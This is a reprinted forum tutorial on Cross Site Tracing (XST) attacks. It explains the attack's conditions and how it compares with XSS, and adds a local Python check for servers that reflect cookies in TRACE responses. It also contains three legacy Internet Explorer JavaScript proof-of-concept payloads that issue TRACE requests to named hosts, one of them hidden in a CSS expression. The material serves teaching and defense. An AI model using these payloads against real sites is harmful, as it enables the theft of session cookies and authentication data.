Cross Site Tracing (XST) Attacks

Source: Internet
Author: User

Reprinted from: http://forum.eviloctal.com/thread-12959-1-1.html

XST attacks are a variant of XSS attacks.

XST attack description:
The attacker embeds malicious code into a web page on a host under their control. When a visitor browses that page, the code runs in the visitor's browser and issues TRACE requests to the target host; because the TRACE response echoes the request, the visitor's cookies, HTTP Basic authentication and NTLM authentication information are sent back to the attacker's host, resulting in cookie spoofing or man-in-the-middle attacks.

XST attack conditions:
1. The target web server must allow the TRACE method;
2. A place to insert the XST code is required;
3. The target site has a cross-origin vulnerability.
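As an added illustration of condition 1 (this is not code from the original post), the following Python check reports whether a web server still answers TRACE and reflects the request's cookies in the response body. The two local handlers are constructed stand-ins for an exposed server and a hardened one; the marker cookie value is constructed.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

MARKER = "xst-probe-value"  # constructed cookie value we expect to see echoed back


class TraceEnabledHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for a server that still answers TRACE (echoes the request)."""

    def do_TRACE(self):
        # A TRACE response carries the request line and all request headers,
        # Cookie and Authorization included, as its body.
        lines = [f"{self.command} {self.path} {self.request_version}"]
        lines += [f"{name}: {value}" for name, value in self.headers.items()]
        body = ("\r\n".join(lines) + "\r\n").encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


class TraceDisabledHandler(TraceEnabledHandler):
    """Constructed stand-in for a hardened server (Apache 'TraceEnable off', nginx default)."""

    def do_TRACE(self):
        self.send_error(405, "Method Not Allowed")


def serve(handler):
    """Start a local server on a free port and return it (server_address holds the port)."""
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def trace_enabled(host, port):
    """True if TRACE is answered with 200 and the marker cookie is reflected in the body."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("TRACE", "/", headers={"Cookie": f"session={MARKER}"})
    resp = conn.getresponse()
    body = resp.read().decode("latin-1")
    conn.close()
    return resp.status == 200 and MARKER in body


if __name__ == "__main__":
    for handler in (TraceEnabledHandler, TraceDisabledHandler):
        srv = serve(handler)
        print(handler.__name__, "-> TRACE reflects cookies:", trace_enabled(*srv.server_address))
        srv.shutdown()
```

A server that reflects the marker is the one the methods below rely on; the fix is to disable TRACE at the web server rather than to filter it in the application.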

Comparison between XST and XSS:
Similarities: both kinds of attack are highly deceptive and can harm the affected hosts. Both also span multiple platforms and technologies; ActiveX controls, Flash, Java and so on can all be used to carry out XST and XSS attacks.
Advantage of XST: normal HTTP authentication and NTLM authentication can be bypassed.

Example code:

Method 1:

<script type="text/javascript">
<!--
function xssTRACE() {
    // Synchronous TRACE request through the IE-only XMLHTTP ActiveX object;
    // the response body echoes the request headers, cookies included.
    var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    xmlHttp.open("TRACE", "http://wmjie.51.net/swords/", false);
    xmlHttp.send();
    xmlDoc = xmlHttp.responseText;
    alert(xmlDoc);
}
// -->
</script>
<input type="button" onclick="xssTRACE();" value="xssTrace">

Method 2:

<script type="text/javascript">
<!--
function xssTRACE() {
    // Open a new window, keep a reference to its "external" object, then
    // navigate it to the target site and run the TRACE request in that context.
    var openWin = open("blank.htm", "swords", "width=500,height=400");
    var oTraceSwords = openWin.external;
    openWin.location.href = "http://wmjie.51.net/swords";
    setTimeout(
        function() {
            // The following must be written on one line
            oTraceSwords.NavigateAndFind('javascript:xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); xmlHttp.open("TRACE", "http://wmjie.51.net/swords/", false); xmlHttp.send(); xmlDoc = xmlHttp.responseText; alert("Without document.cookie, showing the cookies of wmjie.51.net/swords/.\n" + xmlDoc);', "", "");
        },
        1024
    );
}
// -->
</script>
<input type="button" onclick="xssTRACE();" value="xssTrace">

Method 3:

<script type="text/javascript">
function xssTRACE() {
    // The TRACE request is packed into a string and executed via a CSS
    // expression() inside a modal dialog opened on the target site.
    var swords = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\"); xmlHttp.open(\"TRACE\", \"http://www.tingh.com/\", false); xmlHttp.send(); xmlDoc = xmlHttp.responseText; alert(xmlDoc);";
    var target = "http://wmjie.51.net/swords";
    var spinach = encodeURIComponent(swords + '; top.close()');
    var readyCode = 'font-size: expression(execScript(decodeURIComponent("' + spinach + '")))';
    showModalDialog(target, null, readyCode);
}
</script>
<input type="button" onclick="xssTRACE()" value="xssTRACE">
